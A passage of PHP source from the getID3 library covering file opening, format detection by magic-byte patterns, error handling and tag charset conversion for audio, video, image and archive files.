!defined('GETID3_HELPERAPPSDIR')) { $helperappsdir = GETID3_INCLUDEPATH.'..'.DIRECTORY_SEPARATOR.'helperapps'; // must not have any space in this path if (!is_dir($helperappsdir)) { $this->startup_warning .= '"'.$helperappsdir.'" cannot be defined as GETID3_HELPERAPPSDIR because it does not exist'; } elseif (strpos(realpath($helperappsdir), ' ') !== false) { $DirPieces = explode(DIRECTORY_SEPARATOR, realpath($helperappsdir)); $path_so_far = array(); foreach ($DirPieces as $key => $value) { if (strpos($value, ' ') !== false) { if (!empty($path_so_far)) { $commandline = 'dir /x '.escapeshellarg(implode(DIRECTORY_SEPARATOR, $path_so_far)); $dir_listing = `$commandline`; $lines = explode("\n", $dir_listing); foreach ($lines as $line) { $line = trim($line); if (preg_match('#^([0-9/]{10}) +([0-9:]{4,5}( [AP]M)?) +(<DIR>|[0-9,]+) +([^ ]{0,11}) +(.+)$#', $line, $matches)) { list($dummy, $date, $time, $ampm, $filesize, $shortname, $filename) = $matches; if ((strtoupper($filesize) == '<DIR>') && (strtolower($filename) == strtolower($value))) { $value = $shortname; } } } } else { $this->startup_warning .= 'GETID3_HELPERAPPSDIR must not have any spaces in it - use 8dot3 naming convention if neccesary. You can run "dir /x" from the commandline to see the correct 8.3-style names.'; } } $path_so_far[] = $value; } $helperappsdir = implode(DIRECTORY_SEPARATOR, $path_so_far); } define('GETID3_HELPERAPPSDIR', $helperappsdir.DIRECTORY_SEPARATOR); } return true; } public function version() { return self::VERSION; } public function fread_buffer_size() { return $this->option_fread_buffer_size; } // public: setOption public function setOption($optArray) { if (!is_array($optArray) || empty($optArray)) { return false; } foreach ($optArray as $opt => $val) { if (isset($this->$opt) === false) { continue; } $this->$opt = $val; } return true; } public function openfile($filename) { try { if (!empty($this->startup_error)) { throw new getid3_exception($this->startup_error); } if (!empty($this->startup_warning)) { $this->warning($this->startup_warning); } // init result array and set parameters $this->filename = $filename; $this->info = array(); $this->info['GETID3_VERSION'] = $this->version(); $this->info['php_memory_limit'] = (($this->memory_limit > 0) ? $this->memory_limit : false); // remote files not supported if (preg_match('/^(ht|f)tp:\/\//', $filename)) { throw new getid3_exception('Remote files are not supported - please copy the file locally first'); } $filename = str_replace('/', DIRECTORY_SEPARATOR, $filename); $filename = preg_replace('#(.+)'.preg_quote(DIRECTORY_SEPARATOR).'{2,}#U', '\1'.DIRECTORY_SEPARATOR, $filename); // open local file //if (is_readable($filename) && is_file($filename) && ($this->fp = fopen($filename, 'rb'))) { // see http://www.getid3.org/phpBB3/viewtopic.php?t=1720 if ((is_readable($filename) || file_exists($filename)) && is_file($filename) && ($this->fp = fopen($filename, 'rb'))) { // great } else { $errormessagelist = array(); if (!is_readable($filename)) { $errormessagelist[] = '!is_readable'; } if (!is_file($filename)) { $errormessagelist[] = '!is_file'; } if (!file_exists($filename)) { $errormessagelist[] = '!file_exists'; } if (empty($errormessagelist)) { $errormessagelist[] = 'fopen failed'; } throw new getid3_exception('Could not open "'.$filename.'" ('.implode('; ', $errormessagelist).')'); } $this->info['filesize'] = filesize($filename); // set redundant parameters - might be needed in some include file // filenames / filepaths in getID3 are always expressed with forward slashes (unix-style) for both Windows and other to try and minimize confusion $filename = str_replace('\\', '/', $filename); $this->info['filepath'] = str_replace('\\', '/', realpath(dirname($filename))); $this->info['filename'] = getid3_lib::mb_basename($filename); $this->info['filenamepath'] = $this->info['filepath'].'/'.$this->info['filename']; // option_max_2gb_check if ($this->option_max_2gb_check) { // PHP (32-bit all, and 64-bit Windows) doesn't support integers larger than 2^31 (~2GB) // filesize() simply returns (filesize % (pow(2, 32)), no matter the actual filesize // ftell() returns 0 if seeking to the end is beyond the range of unsigned integer $fseek = fseek($this->fp, 0, SEEK_END); if (($fseek < 0) || (($this->info['filesize'] != 0) && (ftell($this->fp) == 0)) || ($this->info['filesize'] < 0) || (ftell($this->fp) < 0)) { $real_filesize = getid3_lib::getFileSizeSyscall($this->info['filenamepath']); if ($real_filesize === false) { unset($this->info['filesize']); fclose($this->fp); throw new getid3_exception('Unable to determine actual filesize. File is most likely larger than '.round(PHP_INT_MAX / 1073741824).'GB and is not supported by PHP.'); } elseif (getid3_lib::intValueSupported($real_filesize)) { unset($this->info['filesize']); fclose($this->fp); throw new getid3_exception('PHP seems to think the file is larger than '.round(PHP_INT_MAX / 1073741824).'GB, but filesystem reports it as '.number_format($real_filesize, 3).'GB, please report to info@getid3.org'); } $this->info['filesize'] = $real_filesize; $this->warning('File is larger than '.round(PHP_INT_MAX / 1073741824).'GB (filesystem reports it as '.number_format($real_filesize, 3).'GB) and is not properly supported by PHP.'); } } // set more parameters $this->info['avdataoffset'] = 0; $this->info['avdataend'] = $this->info['filesize']; $this->info['fileformat'] = ''; // filled in later $this->info['audio']['dataformat'] = ''; // filled in later, unset if not used $this->info['video']['dataformat'] = ''; // filled in later, unset if not used $this->info['tags'] = array(); // filled in later, unset if not used $this->info['error'] = array(); // filled in later, unset if not used $this->info['warning'] = array(); // filled in later, unset if not used $this->info['comments'] = array(); // filled in later, unset if not used $this->info['encoding'] = $this->encoding; // required by id3v2 and iso modules - can be unset at the end if desired return true; } catch (Exception $e) { $this->error($e->getMessage()); } return false; } // public: analyze file public function analyze($filename) { try { if (!$this->openfile($filename)) { return $this->info; } // Handle tags foreach (array('id3v2'=>'id3v2', 'id3v1'=>'id3v1', 'apetag'=>'ape', 'lyrics3'=>'lyrics3') as $tag_name => $tag_key) { $option_tag = 'option_tag_'.$tag_name; if ($this->$option_tag) { $this->include_module('tag.'.$tag_name); try { $tag_class = 'getid3_'.$tag_name; $tag = new $tag_class($this); $tag->Analyze(); } catch (getid3_exception $e) { throw $e; } } } if (isset($this->info['id3v2']['tag_offset_start'])) { $this->info['avdataoffset'] = max($this->info['avdataoffset'], $this->info['id3v2']['tag_offset_end']); } foreach (array('id3v1'=>'id3v1', 'apetag'=>'ape', 'lyrics3'=>'lyrics3') as $tag_name => $tag_key) { if (isset($this->info[$tag_key]['tag_offset_start'])) { $this->info['avdataend'] = min($this->info['avdataend'], $this->info[$tag_key]['tag_offset_start']); } } // ID3v2 detection (NOT parsing), even if ($this->option_tag_id3v2 == false) done to make fileformat easier if (!$this->option_tag_id3v2) { fseek($this->fp, 0); $header = fread($this->fp, 10); if ((substr($header, 0, 3) == 'ID3') && (strlen($header) == 10)) { $this->info['id3v2']['header'] = true; $this->info['id3v2']['majorversion'] = ord($header{3}); $this->info['id3v2']['minorversion'] = ord($header{4}); $this->info['avdataoffset'] += getid3_lib::BigEndian2Int(substr($header, 6, 4), 1) + 10; // length of ID3v2 tag in 10-byte header doesn't include 10-byte header length } } // read 32 kb file data fseek($this->fp, $this->info['avdataoffset']); $formattest = fread($this->fp, 32774); // determine format $determined_format = $this->GetFileFormat($formattest, $filename); // unable to determine file format if (!$determined_format) { fclose($this->fp); return $this->error('unable to determine file format'); } // check for illegal ID3 tags if (isset($determined_format['fail_id3']) && (in_array('id3v1', $this->info['tags']) || in_array('id3v2', $this->info['tags']))) { if ($determined_format['fail_id3'] === 'ERROR') { fclose($this->fp); return $this->error('ID3 tags not allowed on this file type.'); } elseif ($determined_format['fail_id3'] === 'WARNING') { $this->warning('ID3 tags not allowed on this file type.'); } } // check for illegal APE tags if (isset($determined_format['fail_ape']) && in_array('ape', $this->info['tags'])) { if ($determined_format['fail_ape'] === 'ERROR') { fclose($this->fp); return $this->error('APE tags not allowed on this file type.'); } elseif ($determined_format['fail_ape'] === 'WARNING') { $this->warning('APE tags not allowed on this file type.'); } } // set mime type $this->info['mime_type'] = $determined_format['mime_type']; // supported format signature pattern detected, but module deleted if (!file_exists(GETID3_INCLUDEPATH.$determined_format['include'])) { fclose($this->fp); return $this->error('Format not supported, module "'.$determined_format['include'].'" was removed.'); } // module requires iconv support // Check encoding/iconv support if (!empty($determined_format['iconv_req']) && !function_exists('iconv') && !in_array($this->encoding, array('ISO-8859-1', 'UTF-8', 'UTF-16LE', 'UTF-16BE', 'UTF-16'))) { $errormessage = 'iconv() support is required for this module ('.$determined_format['include'].') for encodings other than ISO-8859-1, UTF-8, UTF-16LE, UTF16-BE, UTF-16. '; if (GETID3_OS_ISWINDOWS) { $errormessage .= 'PHP does not have iconv() support. Please enable php_iconv.dll in php.ini, and copy iconv.dll from c:/php/dlls to c:/windows/system32'; } else { $errormessage .= 'PHP is not compiled with iconv() support. Please recompile with the --with-iconv switch'; } return $this->error($errormessage); } // include module include_once(GETID3_INCLUDEPATH.$determined_format['include']); // instantiate module class $class_name = 'getid3_'.$determined_format['module']; if (!class_exists($class_name)) { return $this->error('Format not supported, module "'.$determined_format['include'].'" is corrupt.'); } $class = new $class_name($this); $class->Analyze(); unset($class); // close file fclose($this->fp); // process all tags - copy to 'tags' and convert charsets if ($this->option_tags_process) { $this->HandleAllTags(); } // perform more calculations if ($this->option_extra_info) { $this->ChannelsBitratePlaytimeCalculations(); $this->CalculateCompressionRatioVideo(); $this->CalculateCompressionRatioAudio(); $this->CalculateReplayGain(); $this->ProcessAudioStreams(); } // get the MD5 sum of the audio/video portion of the file - without ID3/APE/Lyrics3/etc header/footer tags if ($this->option_md5_data) { // do not calc md5_data if md5_data_source is present - set by flac only - future MPC/SV8 too if (!$this->option_md5_data_source || empty($this->info['md5_data_source'])) { $this->getHashdata('md5'); } } // get the SHA1 sum of the audio/video portion of the file - without ID3/APE/Lyrics3/etc header/footer tags if ($this->option_sha1_data) { $this->getHashdata('sha1'); } // remove undesired keys $this->CleanUp(); } catch (Exception $e) { $this->error('Caught exception: '.$e->getMessage()); } // return info array return $this->info; } // private: error handling public function error($message) { $this->CleanUp(); if (!isset($this->info['error'])) { $this->info['error'] = array(); } $this->info['error'][] = $message; return $this->info; } // private: warning handling public function warning($message) { $this->info['warning'][] = $message; return true; } // private: CleanUp private function CleanUp() { // remove possible empty keys $AVpossibleEmptyKeys = array('dataformat', 'bits_per_sample', 'encoder_options', 'streams', 'bitrate'); foreach ($AVpossibleEmptyKeys as $dummy => $key) { if (empty($this->info['audio'][$key]) && isset($this->info['audio'][$key])) { unset($this->info['audio'][$key]); } if (empty($this->info['video'][$key]) && isset($this->info['video'][$key])) { unset($this->info['video'][$key]); } } // remove empty root keys if (!empty($this->info)) { foreach ($this->info as $key => $value) { if (empty($this->info[$key]) && ($this->info[$key] !== 0) && ($this->info[$key] !== '0')) { unset($this->info[$key]); } } } // remove meaningless entries from unknown-format files if (empty($this->info['fileformat'])) { if (isset($this->info['avdataoffset'])) { unset($this->info['avdataoffset']); } if (isset($this->info['avdataend'])) { unset($this->info['avdataend']); } } // remove possible duplicated identical entries if (!empty($this->info['error'])) { $this->info['error'] = array_values(array_unique($this->info['error'])); } if (!empty($this->info['warning'])) { $this->info['warning'] = array_values(array_unique($this->info['warning'])); } // remove "global variable" type keys unset($this->info['php_memory_limit']); return true; } // return array containing information about all supported formats public function GetFileFormatArray() { static $format_info = array(); if (empty($format_info)) { $format_info = array( // Audio formats // AC-3 - audio - Dolby AC-3 / Dolby Digital 'ac3' => array( 'pattern' => '^\x0B\x77', 'group' => 'audio', 'module' => 'ac3', 'mime_type' => 'audio/ac3', ), // AAC - audio - Advanced Audio Coding (AAC) - ADIF format 'adif' => array( 'pattern' => '^ADIF', 'group' => 'audio', 'module' => 'aac', 'mime_type' => 'application/octet-stream', 'fail_ape' => 'WARNING', ), /* // AA - audio - Audible Audiobook 'aa' => array( 'pattern' => '^.{4}\x57\x90\x75\x36', 'group' => 'audio', 'module' => 'aa', 'mime_type' => 'audio/audible', ), */ // AAC - audio - Advanced Audio Coding (AAC) - ADTS format (very similar to MP3) 'adts' => array( 'pattern' => '^\xFF[\xF0-\xF1\xF8-\xF9]', 'group' => 'audio', 'module' => 'aac', 'mime_type' => 'application/octet-stream', 'fail_ape' => 'WARNING', ), // AU - audio - NeXT/Sun AUdio (AU) 'au' => array( 'pattern' => '^\.snd', 'group' => 'audio', 'module' => 'au', 'mime_type' => 'audio/basic', ), // AMR - audio - Adaptive Multi Rate 'amr' => array( 'pattern' => '^\x23\x21AMR\x0A', // #!AMR[0A] 'group' => 'audio', 'module' => 'amr', 'mime_type' => 'audio/amr', ), // AVR - audio - Audio Visual Research 'avr' => array( 'pattern' => '^2BIT', 'group' => 'audio', 'module' => 'avr', 'mime_type' => 'application/octet-stream', ), // BONK - audio - Bonk v0.9+ 'bonk' => array( 'pattern' => '^\x00(BONK|INFO|META| ID3)', 'group' => 'audio', 'module' => 'bonk', 'mime_type' => 'audio/xmms-bonk', ), // DSS - audio - Digital Speech Standard 'dss' => array( 'pattern' => '^[\x02-\x03]ds[s2]', 'group' => 'audio', 'module' => 'dss', 'mime_type' => 'application/octet-stream', ), // DTS - audio - Dolby Theatre System 'dts' => array( 'pattern' => '^\x7F\xFE\x80\x01', 'group' => 'audio', 'module' => 'dts', 'mime_type' => 'audio/dts', ), // FLAC - audio - Free Lossless Audio Codec 'flac' => array( 'pattern' => '^fLaC', 'group' => 'audio', 'module' => 'flac', 'mime_type' => 'audio/x-flac', ), // LA - audio - Lossless Audio (LA) 'la' => array( 'pattern' => '^LA0[2-4]', 'group' => 'audio', 'module' => 'la', 'mime_type' => 'application/octet-stream', ), // LPAC - audio - Lossless Predictive Audio Compression (LPAC) 'lpac' => array( 'pattern' => '^LPAC', 'group' => 'audio', 'module' => 'lpac', 'mime_type' => 'application/octet-stream', ), // MIDI - audio - MIDI (Musical Instrument Digital Interface) 'midi' => array( 'pattern' => '^MThd', 'group' => 'audio', 'module' => 'midi', 'mime_type' => 'audio/midi', ), // MAC - audio - Monkey's Audio Compressor 'mac' => array( 'pattern' => '^MAC ', 'group' => 'audio', 'module' => 'monkey', 'mime_type' => 'application/octet-stream', ), // has been known to produce false matches in random files (e.g. JPEGs), leave out until more precise matching available // // MOD - audio - MODule (assorted sub-formats) // 'mod' => array( // 'pattern' => '^.{1080}(M\\.K\\.|M!K!|FLT4|FLT8|[5-9]CHN|[1-3][0-9]CH)', // 'group' => 'audio', // 'module' => 'mod', // 'option' => 'mod', // 'mime_type' => 'audio/mod', // ), // MOD - audio - MODule (Impulse Tracker) 'it' => array( 'pattern' => '^IMPM', 'group' => 'audio', 'module' => 'mod', //'option' => 'it', 'mime_type' => 'audio/it', ), // MOD - audio - MODule (eXtended Module, various sub-formats) 'xm' => array( 'pattern' => '^Extended Module', 'group' => 'audio', 'module' => 'mod', //'option' => 'xm', 'mime_type' => 'audio/xm', ), // MOD - audio - MODule (ScreamTracker) 's3m' => array( 'pattern' => '^.{44}SCRM', 'group' => 'audio', 'module' => 'mod', //'option' => 's3m', 'mime_type' => 'audio/s3m', ), // MPC - audio - Musepack / MPEGplus 'mpc' => array( 'pattern' => '^(MPCK|MP\+|[\x00\x01\x10\x11\x40\x41\x50\x51\x80\x81\x90\x91\xC0\xC1\xD0\xD1][\x20-37][\x00\x20\x40\x60\x80\xA0\xC0\xE0])', 'group' => 'audio', 'module' => 'mpc', 'mime_type' => 'audio/x-musepack', ), // MP3 - audio - MPEG-audio Layer 3 (very similar to AAC-ADTS) 'mp3' => array( 'pattern' => '^\xFF[\xE2-\xE7\xF2-\xF7\xFA-\xFF][\x00-\x0B\x10-\x1B\x20-\x2B\x30-\x3B\x40-\x4B\x50-\x5B\x60-\x6B\x70-\x7B\x80-\x8B\x90-\x9B\xA0-\xAB\xB0-\xBB\xC0-\xCB\xD0-\xDB\xE0-\xEB\xF0-\xFB]', 'group' => 'audio', 'module' => 'mp3', 'mime_type' => 'audio/mpeg', ), // OFR - audio - OptimFROG 'ofr' => array( 'pattern' => '^(\*RIFF|OFR)', 'group' => 'audio', 'module' => 'optimfrog', 'mime_type' => 'application/octet-stream', ), // RKAU - audio - RKive AUdio compressor 'rkau' => array( 'pattern' => '^RKA', 'group' => 'audio', 'module' => 'rkau', 'mime_type' => 'application/octet-stream', ), // SHN - audio - Shorten 'shn' => array( 'pattern' => '^ajkg', 'group' => 'audio', 'module' => 'shorten', 'mime_type' => 'audio/xmms-shn', 'fail_id3' => 'ERROR', 'fail_ape' => 'ERROR', ), // TTA - audio - TTA Lossless Audio Compressor (http://tta.corecodec.org) 'tta' => array( 'pattern' => '^TTA', // could also be '^TTA(\x01|\x02|\x03|2|1)' 'group' => 'audio', 'module' => 'tta', 'mime_type' => 'application/octet-stream', ), // VOC - audio - Creative Voice (VOC) 'voc' => array( 'pattern' => '^Creative Voice File', 'group' => 'audio', 'module' => 'voc', 'mime_type' => 'audio/voc', ), // VQF - audio - transform-domain weighted interleave Vector Quantization Format (VQF) 'vqf' => array( 'pattern' => '^TWIN', 'group' => 'audio', 'module' => 'vqf', 'mime_type' => 'application/octet-stream', ), // WV - audio - WavPack (v4.0+) 'wv' => array( 'pattern' => '^wvpk', 'group' => 'audio', 'module' => 'wavpack', 'mime_type' => 'application/octet-stream', ), // Audio-Video formats // ASF - audio/video - Advanced Streaming Format, Windows Media Video, Windows Media Audio 'asf' => array( 'pattern' => '^\x30\x26\xB2\x75\x8E\x66\xCF\x11\xA6\xD9\x00\xAA\x00\x62\xCE\x6C', 'group' => 'audio-video', 'module' => 'asf', 'mime_type' => 'video/x-ms-asf', 'iconv_req' => false, ), // BINK - audio/video - Bink / Smacker 'bink' => array( 'pattern' => '^(BIK|SMK)', 'group' => 'audio-video', 'module' => 'bink', 'mime_type' => 'application/octet-stream', ), // FLV - audio/video - FLash Video 'flv' => array( 'pattern' => '^FLV\x01', 'group' => 'audio-video', 'module' => 'flv', 'mime_type' => 'video/x-flv', ), // MKAV - audio/video - Mastroka 'matroska' => array( 'pattern' => '^\x1A\x45\xDF\xA3', 'group' => 'audio-video', 'module' => 'matroska', 'mime_type' => 'video/x-matroska', // may also be audio/x-matroska ), // MPEG - audio/video - MPEG (Moving Pictures Experts Group) 'mpeg' => array( 'pattern' => '^\x00\x00\x01(\xBA|\xB3)', 'group' => 'audio-video', 'module' => 'mpeg', 'mime_type' => 'video/mpeg', ), // NSV - audio/video - Nullsoft Streaming Video (NSV) 'nsv' => array( 'pattern' => '^NSV[sf]', 'group' => 'audio-video', 'module' => 'nsv', 'mime_type' => 'application/octet-stream', ), // Ogg - audio/video - Ogg (Ogg-Vorbis, Ogg-FLAC, Speex, Ogg-Theora(*), Ogg-Tarkin(*)) 'ogg' => array( 'pattern' => '^OggS', 'group' => 'audio', 'module' => 'ogg', 'mime_type' => 'application/ogg', 'fail_id3' => 'WARNING', 'fail_ape' => 'WARNING', ), // QT - audio/video - Quicktime 'quicktime' => array( 'pattern' => '^.{4}(cmov|free|ftyp|mdat|moov|pnot|skip|wide)', 'group' => 'audio-video', 'module' => 'quicktime', 'mime_type' => 'video/quicktime', ), // RIFF - audio/video - Resource Interchange File Format (RIFF) / WAV / AVI / CD-audio / SDSS = renamed variant used by SmartSound QuickTracks (www.smartsound.com) / FORM = Audio Interchange File Format (AIFF) 'riff' => array( 'pattern' => '^(RIFF|SDSS|FORM)', 'group' => 'audio-video', 'module' => 'riff', 'mime_type' => 'audio/x-wave', 'fail_ape' => 'WARNING', ), // Real - audio/video - RealAudio, RealVideo 'real' => array( 'pattern' => '^(\\.RMF|\\.ra)', 'group' => 'audio-video', 'module' => 'real', 'mime_type' => 'audio/x-realaudio', ), // SWF - audio/video - ShockWave Flash 'swf' => array( 'pattern' => '^(F|C)WS', 'group' => 'audio-video', 'module' => 'swf', 'mime_type' => 'application/x-shockwave-flash', ), // TS - audio/video - MPEG-2 Transport Stream 'ts' => array( 'pattern' => '^(\x47.{187}){10,}', // packets are 188 bytes long and start with 0x47 "G". Check for at least 10 packets matching this pattern 'group' => 'audio-video', 'module' => 'ts', 'mime_type' => 'video/MP2T', ), // Still-Image formats // BMP - still image - Bitmap (Windows, OS/2; uncompressed, RLE8, RLE4) 'bmp' => array( 'pattern' => '^BM', 'group' => 'graphic', 'module' => 'bmp', 'mime_type' => 'image/bmp', 'fail_id3' => 'ERROR', 'fail_ape' => 'ERROR', ), // GIF - still image - Graphics Interchange Format 'gif' => array( 'pattern' => '^GIF', 'group' => 'graphic', 'module' => 'gif', 'mime_type' => 'image/gif', 'fail_id3' => 'ERROR', 'fail_ape' => 'ERROR', ), // JPEG - still image - Joint Photographic Experts Group (JPEG) 'jpg' => array( 'pattern' => '^\xFF\xD8\xFF', 'group' => 'graphic', 'module' => 'jpg', 'mime_type' => 'image/jpeg', 'fail_id3' => 'ERROR', 'fail_ape' => 'ERROR', ), // PCD - still image - Kodak Photo CD 'pcd' => array( 'pattern' => '^.{2048}PCD_IPI\x00', 'group' => 'graphic', 'module' => 'pcd', 'mime_type' => 'image/x-photo-cd', 'fail_id3' => 'ERROR', 'fail_ape' => 'ERROR', ), // PNG - still image - Portable Network Graphics (PNG) 'png' => array( 'pattern' => '^\x89\x50\x4E\x47\x0D\x0A\x1A\x0A', 'group' => 'graphic', 'module' => 'png', 'mime_type' => 'image/png', 'fail_id3' => 'ERROR', 'fail_ape' => 'ERROR', ), // SVG - still image - Scalable Vector Graphics (SVG) 'svg' => array( 'pattern' => '(<!DOCTYPE svg PUBLIC |xmlns="http:\/\/www\.w3\.org\/2000\/svg")', 'group' => 'graphic', 'module' => 'svg', 'mime_type' => 'image/svg+xml', 'fail_id3' => 'ERROR', 'fail_ape' => 'ERROR', ), // TIFF - still image - Tagged Information File Format (TIFF) 'tiff' => array( 'pattern' => '^(II\x2A\x00|MM\x00\x2A)', 'group' => 'graphic', 'module' => 'tiff', 'mime_type' => 'image/tiff', 'fail_id3' => 'ERROR', 'fail_ape' => 'ERROR', ), // EFAX - still image - eFax (TIFF derivative) 'efax' => array( 'pattern' => '^\xDC\xFE', 'group' => 'graphic', 'module' => 'efax', 'mime_type' => 'image/efax', 'fail_id3' => 'ERROR', 'fail_ape' => 'ERROR', ), // Data formats // ISO - data - International Standards Organization (ISO) CD-ROM Image 'iso' => array( 'pattern' => '^.{32769}CD001', 'group' => 'misc', 'module' => 'iso', 'mime_type' => 'application/octet-stream', 'fail_id3' => 'ERROR', 'fail_ape' => 'ERROR', 'iconv_req' => false, ), // RAR - data - RAR compressed data 'rar' => array( 'pattern' => '^Rar\!', 'group' => 'archive', 'module' => 'rar', 'mime_type' => 'application/octet-stream', 'fail_id3' => 'ERROR', 'fail_ape' => 'ERROR', ), // SZIP - audio/data - SZIP compressed data 'szip' => array( 'pattern' => '^SZ\x0A\x04', 'group' => 'archive', 'module' => 'szip', 'mime_type' => 'application/octet-stream', 'fail_id3' => 'ERROR', 'fail_ape' => 'ERROR', ), // TAR - data - TAR compressed data 'tar' => array( 'pattern' => '^.{100}[0-9\x20]{7}\x00[0-9\x20]{7}\x00[0-9\x20]{7}\x00[0-9\x20\x00]{12}[0-9\x20\x00]{12}', 'group' => 'archive', 'module' => 'tar', 'mime_type' => 'application/x-tar', 'fail_id3' => 'ERROR', 'fail_ape' => 'ERROR', ), // GZIP - data - GZIP compressed data 'gz' => array( 'pattern' => '^\x1F\x8B\x08', 'group' => 'archive', 'module' => 'gzip', 'mime_type' => 'application/x-gzip', 'fail_id3' => 'ERROR', 'fail_ape' => 'ERROR', ), // ZIP - data - ZIP compressed data 'zip' => array( 'pattern' => '^PK\x03\x04', 'group' => 'archive', 'module' => 'zip', 'mime_type' => 'application/zip', 'fail_id3' => 'ERROR', 'fail_ape' => 'ERROR', ), // Misc other formats // PAR2 - data - Parity Volume Set Specification 2.0 'par2' => array ( 'pattern' => '^PAR2\x00PKT', 'group' => 'misc', 'module' => 'par2', 'mime_type' => 'application/octet-stream', 'fail_id3' => 'ERROR', 'fail_ape' => 'ERROR', ), // PDF - data - Portable Document Format 'pdf' => array( 'pattern' => '^\x25PDF', 'group' => 'misc', 'module' => 'pdf', 'mime_type' => 'application/pdf', 'fail_id3' => 'ERROR', 'fail_ape' => 'ERROR', ), // MSOFFICE - data - ZIP compressed data 'msoffice' => array( 'pattern' => '^\xD0\xCF\x11\xE0\xA1\xB1\x1A\xE1', // D0CF11E == DOCFILE == Microsoft Office Document 'group' => 'misc', 'module' => 'msoffice', 'mime_type' => 'application/octet-stream', 'fail_id3' => 'ERROR', 'fail_ape' => 'ERROR', ), // CUE - data - CUEsheet (index to single-file disc images) 'cue' => array( 'pattern' => '', // empty pattern means cannot be automatically detected, will fall through all other formats and match based on filename and very basic file contents 'group' => 'misc', 'module' => 'cue', 'mime_type' => 'application/octet-stream', ), ); } return $format_info; } public function GetFileFormat(&$filedata, $filename='') { // this function will determine the format of a file based on usually // the first 2-4 bytes of the file (8 bytes for PNG, 16 bytes for JPG, // and in the case of ISO CD image, 6 bytes offset 32kb from the start // of the file). // Identify file format - loop through $format_info and detect with reg expr foreach ($this->GetFileFormatArray() as $format_name => $info) { // The /s switch on preg_match() forces preg_match() NOT to treat // newline (0x0A) characters as special chars but do a binary match if (!empty($info['pattern']) && preg_match('#'.$info['pattern'].'#s', $filedata)) { $info['include'] = 'module.'.$info['group'].'.'.$info['module'].'.php'; return $info; } } if (preg_match('#\.mp[123a]$#i', $filename)) { // Too many mp3 encoders on the market put gabage in front of mpeg files // use assume format on these if format detection failed $GetFileFormatArray = $this->GetFileFormatArray(); $info = $GetFileFormatArray['mp3']; $info['include'] = 'module.'.$info['group'].'.'.$info['module'].'.php'; return $info; } elseif (preg_match('/\.cue$/i', $filename) && preg_match('#FILE "[^"]+" (BINARY|MOTOROLA|AIFF|WAVE|MP3)#', $filedata)) { // there's not really a useful consistent "magic" at the beginning of .cue files to identify them // so until I think of something better, just go by filename if all other format checks fail // and verify there's at least one instance of "TRACK xx AUDIO" in the file $GetFileFormatArray = $this->GetFileFormatArray(); $info = $GetFileFormatArray['cue']; $info['include'] = 'module.'.$info['group'].'.'.$info['module'].'.php'; return $info; } return false; } // converts array to $encoding charset from $this->encoding public function CharConvert(&$array, $encoding) { // identical encoding - end here if ($encoding == $this->encoding) { return; } // loop thru array foreach ($array as $key => $value) { // go recursive if (is_array($value)) { $this->CharConvert($array[$key], $encoding); } // convert string elseif (is_string($value)) { $array[$key] = trim(getid3_lib::iconv_fallback($encoding, $this->encoding, $value)); } } } public function HandleAllTags() { // key name => array (tag name, character encoding) static $tags; if (empty($tags)) { $tags = array( 'asf' => array('asf' , 'UTF-16LE'), 'midi' => array('midi' , 'ISO-8859-1'), 'nsv' => array('nsv' , 'ISO-8859-1'), 'ogg' => array('vorbiscomment' , 'UTF-8'), 'png' => array('png' , 'UTF-8'), 'tiff' => array('tiff' , 'ISO-8859-1'), 'quicktime' => array('quicktime' , 'UTF-8'), 'real' => array('real' , 'ISO-8859-1'), 'vqf' => array('vqf' , 'ISO-8859-1'), 'zip' => array('zip' , 'ISO-8859-1'), 'riff' => array('riff' , 'ISO-8859-1'), 'lyrics3' => array('lyrics3' , 'ISO-8859-1'), 'id3v1' => array('id3v1' , $this->encoding_id3v1), 'id3v2' => array('id3v2' , 'UTF-8'), // not according to the specs (every frame can have a different encoding), but getID3() force-converts all encodings to UTF-8 'ape' => array('ape' , 'UTF-8'), 'cue' => array('cue' , 'ISO-8859-1'), 'matroska' => array('matroska' , 'UTF-8'), 'flac' => array('vorbiscomment' , 'UTF-8'), 'divxtag' => array('divx' , 'ISO-8859-1'), 'iptc' => array('iptc' , 'ISO-8859-1'), ); } // loop through comments array foreach ($tags as $comment_name => $tagname_encoding_array) { list($tag_name, $encoding) = $tagname_encoding_array; // fill in default encoding type if not already present if (isset($this->info[$comment_name]) && !isset($this->info[$comment_name]['encoding'])) { $this->info[$comment_name]['encoding'] = $encoding; } // copy comments if key name set if (!empty($this->info[$comment_name]['comments'])) { foreach ($this->info[$comment_name]['comments'] as $tag_key => $valuearray) { foreach ($valuearray as $key => $value) { if (is_string($value)) { $value = trim($value, " \r\n\t"); // do not trim nulls from $value!! Unicode characters will get mangled if trailing nulls are removed! } if ($value) { if (!is_numeric($key)) { $this->info['tags'][trim($tag_name)][trim($tag_key)][$key] = $value; } else { $this->info['tags'][trim($tag_name)][trim($tag_key)][] = $value; } } } if ($tag_key == 'picture') { unset($this->info[$comment_name]['comments'][$tag_key]); } } if (!isset($this->info['tags'][$tag_name])) { // comments are set but contain nothing but empty strings, so skip continue; } if ($this->option_tags_html) { foreach ($this->info['tags'][$tag_name] as $tag_key => $valuearray) { $this->info['tags_html'][$tag_name][$tag_key] = getid3_lib::recursiveMultiByteCharString2HTML($valuearray, $encoding); } } $this->CharConvert($this->info['tags'][$tag_name], $encoding); // only copy gets converted! } } // pictures can take up a lot of space, and we don't need multiple copies of them // let there be a single copy in [comments][picture], and not elsewhere if (!empty($this->info['tags'])) { $unset_keys = array('tags', 'tags_html'); foreach ($this->info['tags'] as $tagtype => $tagarray) { foreach ($tagarray as $tagname => $tagdata) { if ($tagname == 'picture') { foreach ($tagdata as $key => $tagarray) { $this->info['comments']['picture'][] = $tagarray; if (isset($tagarray['data']) && isset($tagarray['image_mime'])) { if (isset($this->info['tags'][$tagtype][$tagname][$key])) { unset($this->info['tags'][$tagtype][$tagname][$key]); } if (isset($this->info['tags_html'][$tagtype][$tagname][$key])) { unset($this->info['tags_html'][$tagtype][$tagname][$key]); } } } } } foreach ($unset_keys as $unset_key) { // remove possible empty keys from (e.g. [tags][id3v2][picture]) if (empty($this->info[$unset_key][$tagtype]['picture'])) { unset($this->info[$unset_key][$tagtype]['picture']); } if (empty($this->info[$unset_key][$tagtype])) { unset($this->info[$unset_key][$tagtype]); } if (empty($this->info[$unset_key])) { unset($this->info[$unset_key]); } } // remove duplicate copy of picture data from (e.g. [id3v2][comments][picture]) if (isset($this->info[$tagtype]['comments']['picture'])) { unset($this->info[$tagtype]['comments']['picture']); } if (empty($this->info[$tagtype]['comments'])) { unset($this->info[$tagtype]['comments']); } if (empty($this->info[$tagtype])) { unset($this->info[$tagtype]); } } } return true; } public function getHashdata($algorithm) { switch ($algorithm) { case 'md5': case 